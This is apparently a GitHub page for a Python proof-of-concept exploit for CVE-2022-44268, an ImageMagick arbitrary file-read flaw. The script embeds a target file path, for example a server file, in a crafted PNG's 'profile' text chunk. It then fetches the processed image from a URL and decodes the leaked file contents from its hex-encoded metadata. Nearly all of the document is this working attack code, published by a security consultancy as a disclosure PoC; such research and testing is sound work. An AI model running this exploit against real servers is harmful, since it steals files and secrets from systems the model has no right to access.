-
Notifications
You must be signed in to change notification settings - Fork 7
/
CVE-2022-44268.py
48 lines (36 loc) · 1.74 KB
/
CVE-2022-44268.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
import argparse
import requests
import io
from PIL import Image, PngImagePlugin
def main():
if args.url:
headers = {'User-Agent': 'Shift Security Consulting https://shiftsecurityconsulting.com - CVE-2022-44268'}
response = requests.get(args.url)
img = Image.open(io.BytesIO(response.content))
# Extract the raw profile type from the image metadata
raw_profile_type = img.info.get('Raw profile type', '').split("\n")[3:]
raw_profile_type_stipped = "\n".join(raw_profile_type)
# Decrypt the raw profile type from hex format
decrypted_profile_type = bytes.fromhex(raw_profile_type_stipped).decode('utf-8')
# Print the decrypted profile type
print(decrypted_profile_type)
elif args.image:
# Open the image file
img = Image.open(args.image)
# Create a PngInfo object and add the text
info = PngImagePlugin.PngInfo()
info.add_text('profile', args.file_to_read, zip=False)
# Save the modified image to a new file
img.save(args.output, 'PNG', pnginfo=info)
else:
print('Proof of Concept Exploit for CVE-2022-44268 by Milan Jovic - https://shiftsecurityconsulting.com\nUse -h for help')
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Proof of Concept Exploit for CVE-2022-44268 by Milan Jovic - https://shiftsecurityconsulting.com')
parser.add_argument('--url', help='The URL of the uploaded PNG image')
parser.add_argument('--image', help='Input PNG file')
parser.add_argument('--file-to-read', help='File to read')
parser.add_argument('--output', help='Output PNG file')
args = parser.parse_args()
if not vars(args):
parser.print_help()
main()